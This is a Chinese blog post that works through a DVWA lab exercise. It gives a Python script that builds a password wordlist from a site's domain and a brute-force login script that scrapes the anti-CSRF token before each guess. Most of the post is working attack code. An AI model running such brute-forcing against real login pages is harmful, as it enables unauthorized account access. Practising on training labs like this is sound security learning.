Python编写字典生成工具&密码暴破脚本

最新推荐文章于 2024-05-13 11:31:50 发布
最新推荐文章于 2024-05-13 11:31:50 发布
阅读量681 收藏 4
点赞数 1
分类专栏: Python脚本 文章标签: python 字典 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605352/article/details/117302029
版权

字典生成

使用exrex第三方模块,生成自定义字典,传入定制的网站域名,这里用DVWA靶场演示:

import exrex

# print(list(exrex.generate('[Pp][a@]ssw[o0]d')))
# print(exrex.count('[1]{0,9}'))
# print(exrex.getone('\d{4}-\d{6}'))

while_list = ['cn', 'net', 'com', 'edu', 'gov', 'org']


# 解析传入的url
def host_parse(host):
    if '://' in host:
        host = host.split('://')[1].replace('/', '')
    # return host
    if '/' in host:
        host = host.reaplace('/', '')
    return host


# 去掉无用的东西
def dic_create(hosts):
    dics = []
    web_dics = hosts.split('.')
    for web_dic in web_dics:
        if web_dic not in while_list:
            dics.append(web_dic)
    return dics


# 创建字典
def make_pass(dics):
    for dic in dics:
        f_pass = open('pass.txt', 'r')
        for pwd in f_pass:
            pwd = pwd.strip('\n')
            final_pwds = list(exrex.generate(dic + '@' + pwd))
            for final_pwd in final_pwds:
                print(final_pwd)


if __name__ == '__main__':
    url = 'http://127.0.0.1/i/DVWA-master/'
    dics = dic_create(host_parse(url))
    make_pass(dics)

运行结果:
在这里插入图片描述

密码暴破

这里用绕过DVWA high级别token防暴破演示,先获取token再登录,根据页面返回特征作为判断是否登录成功:

# coding:utf-8

import requests
from bs4 import BeautifulSoup
import time

# import re

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0",
    "Cookie": "security=high; PHPSESSID=b171pc6qicumo686s83fqfe6t5"
}


# 获取token
def getToken(url):
    # 访问首页
    res = requests.get(url, headers=headers)
    # print(res.status_code)
    soup = BeautifulSoup(res.text, "html.parser")
    user_token = soup.find_all("input")[3]["value"]
    return user_token


# 模拟登录
def Sign_in(url, username, password):
    user_token = getToken(url)
    data = {
        "username": username.strip(),
        "password": password.strip(),
        "Login": "Login",
        "user_token": user_token
    }
    res = requests.post(url, params=data, headers=headers)
    return res.text


# 判断登录是否成功
def burte_force(url, username, password):
    text = Sign_in(url, username, password)
    if 'Username and/or password incorrect.' not in text:  # 根据页面返回特征判断
        print('\n[+] 破解成功')
        print('[+] 用户名:', username.strip())
        print('[+] 密码:', password.strip())
        return 1
    # else:
    #     print(len(text))


# 遍历字典暴破密码
def main():
    usernames = open("username.txt", 'r', encoding="utf-8")
    passwords = open("password.txt", 'r', encoding='utf-8')
    url = 'http://127.0.0.1/i/DVWA-master/vulnerabilities/brute/'
    flag = 0
    print("\r[+] bursting.......Please wait........", end="", flush=True)
    for username in usernames:
        passwords.seek(0)  # 必需
        for password in passwords:
            flag = burte_force(url, username, password)
            if flag:
                break
        if flag:
            break
    if flag == 0:
        print("[-] 破解失败")


    passwords.close()
    usernames.close()


if __name__ == '__main__':
    start = time.time()
    main()
    end =time.time()
    print("[+] ..........耗时:{0:.5f}秒..........".format(end-start))

运行结果:
在这里插入图片描述
这里是单线程,暴破速度比较慢,但是改为多线程访问速度过快后又出现奇怪的错误,没能找到好的解决方法。

yAnd0n9
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用exrex第三方模块,制作私人订制的高精度密码字典,保存至txt
jexsen的博客
03-05 833
使用exrex第三方模块,制作私人订制的高精度密码字典,保存至txt 使用了exrex第三方模块(产生自定义字典)。 使用了sys.argv功能,在cmd下执行py脚本 手工传入需要定制的网站域名,如http://study.google.com 使用了,自己创建的rule.ini配置文件,后期制作字典,只需要更改配置文件的配置规则即可。 可以自定义生成密码的位数,如大于等于8位,保存至本地txt。 #!/usr/bin/env python # -*- coding: utf-8 -*- import
【网络安全 | 渗透工具密码字典生成工具crunch、cupp安装使用教程
等风来
01-04 5133
Crunch是一个常用的密码破解工具,它可以根据指定的字符集、长度和模式生成各种可能的密码并进行暴力破解。同时,Crunch可以将生成密码保存到文件中,以便在破解工具中使用。在进行渗透测试时,手动收集密码字典是十分耗时的,利用密码字典生成工具可以大幅缩短时间,提高爆破宽度。
密码字典生成工具_用python生成密码字典的2种方法
weixin_39566882的博客
11-29 1176
本文介绍如何用python生成字典输入指定字符和位数,生成一个密码字典首先说简单的,一句话生成for x in itertools.product('0123',repeat=4):print "".join(x)是的就是这么简单python的itertools库是一个 创建迭代器以实现高效循环的函数库(google翻译)库中的product函数就实现了一个类似字典生成的方法,第一个参数是用作生成...
【网络安全 密码学】密码字典生成工具crunch、cupp安装使用教程(1)
最新发布
2401_84544531的博客
05-13 827
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
python高精度字典生成程序
LoveStarbucks的博客
01-03 372
python高精度字典生成程序 1.导入相应的模块 pip install exrex 2.准备一个比较常用的基础字典 admin root 123456 manger system abcde 3.这一步可以放在后面可以先不写配置文件,直接在代码中写生成格式 可以把读配置文件的操作先去掉 代买可以写为: dic=list(exrex.generate('{}[@!$]{}'.format(r...
python生成字典暴力破解
weixin_50464560的博客
03-30 606
目标:python生成一个字典来暴力破解这样,可爆破验证码等 将print的int型转换成str型结果输出到文件中,比如文件在D:\out.txt: i = 100000 w = open('hello.txt', 'w+') while i < 1000000: w.write(str(i)+'\n') i = i + 1 结果: ...
python多线程破解压缩包_python利用itertools生成密码字典并多线程撞库破解rar密码...
weixin_39747630的博客
12-02 436
脚本功能:利用itertools生成密码字典(迭代器形式)多线程并发从密码字典中取出密码进行验证验证成功后把密码写入文件中保存#!/usr/bin/env python# -*- coding: UTF-8 -*-# Author:Leslie-ximport itertools as itsimport threadingimport rarfileimport oswords = '01234...
python生成密码字典太慢了,python生成密码字典的方法
weixin_33548923的博客
03-26 794
这里我使用的是python27主要用的是我之前博文里提到的itertools循环迭代的模块,用这个模块可以省不少事首先要调用itertoolsimport itertools as its然后将字典需要的元素(或者说是关键字)赋给word变量我们这里假设密码是纯数字,所以元素就是1234567890即代码words = "1234568790"假设密码是4位,那么需要元素在迭代器中循环4次,即r ...
密码字典生成工具:crunch
热门推荐
weixin_41715662的博客
07-10 1万+
字典生成工具(crunch)的使用详解
python字典生成
07-28
在描述中提到的"dictionary.exe"可能是一个用于字典生成或爆破的可执行程序,而在Python环境下,我们通常会编写脚本来实现这类功能。例如,我们可以创建一个脚本,根据用户指定的字符集和长度生成密码字典: ```...
上传漏洞fuzz字典生成脚本python
12-17
在这个场景下,Python被用作编写fuzz字典生成脚本的语言,因为Python具有丰富的库支持和简洁的语法,非常适合自动化任务和网络测试。 【描述】"fuzz"一词在信息安全中通常指的是通过输入大量随机数据(称为fuzz数据...
common-password:字典生成脚本, 用python语言写成的可交互性的字典生成脚本。尤其适合社会工程学,当你收集到目标的具体信息后,你就可以通过这个脚本来智能化生成关于目标的字典
06-09
介绍 cupp.py: 强大的字典生成脚本。它是一款用python语言写成的可交互性的字典生成脚本。尤其适合社会工程学,当你收集到目标的具体信息后,你就可以通过这个脚本来智能化生成关于目标的字典。 认证的最常用格式就是用户名和密码的组合。如果这两项都与存储的用户和密码相匹配的话就允许连接。密码强度是用来衡量通过密码技术和字典自动检测来猜测或者破解密码的难易程度。 弱密码可能会比较短或者仅仅包含一些字母,这使破解变得更加容易。弱密码常会有另外一个特点,可以根据一个人的资料,例如生日,昵称,地址,姓名宠物名等,或者一些大众化的词例如god,love,money,password等等。 选项 用法: cupp.py [选项] -h this menu -i Interactive questions for user password profiling -
Python3编写实用脚本程序-自动生成数据库表字典的markdown文本.zip
05-23
本资源“Python3编写实用脚本程序-自动生成数据库表字典的markdown文本.zip”是一个示例,它展示了如何利用Python3来生成关于数据库表的Markdown格式文本,这在文档整理、数据管理和团队协作中非常有用。 首先,让...
Python3自动生成MySQL数据字典的markdown文本的实现
09-08
总之,这个Python3脚本大大简化了生成MySQL数据字典的过程,通过自动化处理,节省了大量手动操作的时间,提高了工作效率。用户可以通过配置连接信息或直接运行打包好的可执行文件,轻松获取所需的数据字典Markdown...
Python-scripts:用python编写脚本
03-28
在这样的项目中,我们可以期待找到各种Python脚本示例、工具或者框架,供学习和参考。 在深入学习这个"Python-scripts"项目之前,我们需要了解Python的基本语法,比如变量、数据类型(如整型、浮点型、字符串、列表...
一款强大的密码字典生成工具
Javachichi的博客
01-05 890
一份强大的密码字典可使“肾透”事半功倍。那如何得到一份这样的字典呢?这需要我们根据收集到的信息自己来创建。
好用的fuzz字典以及fuzz字典生成工具
qq_44005305的博客
03-05 1024
学习xss的时候翻阅资料发现了一个文件上传漏洞fuzz字典生成脚本工具,试了试还不错,分享一下可以自定义中间件,后端语言,系统,来生成fuzz,要是手工测试的会很累,精确的还行,就是跑的还是蛮多的,对服务器还是有影响,我本地跑的,生成了很多的图片,所以肯定没有手工注入准确,最后,这个工具还是很不错的,感觉可以的可以尝试一下。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
python 穷举法生成爆破密码词典
MuratHalik的博客
11-05 1988
本次折腾用于忘记比特币核心钱包支付密码的暴力破解(如果成功我就躺平!python 穷举法生成爆破密码词典。
airmon-ng破解wifi
skywalkerch的博客
02-28 4219
1. 安装 aircrack-ng 使用相应包管理工具安装,例如 Debian/Ubuntu 使用 apt 安装: sudo apt install aircrack-ng 2. 查看可用的无线网卡 使用命令:airmon-ng netcon@conwlt:~/workspace$ sudo airmon-ng PHY Interface Driver Chipset phy0 wlp8s0 iwlwifi Intel Corporation Ce...
python密码字典生成
11-29
Python密码字典生成器可以通过Python编写一个脚本来实现。以下是一个简单的示例: ```python import itertools import argparse def generate_passwords(template_file, keywords, special_chars, output_file): ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值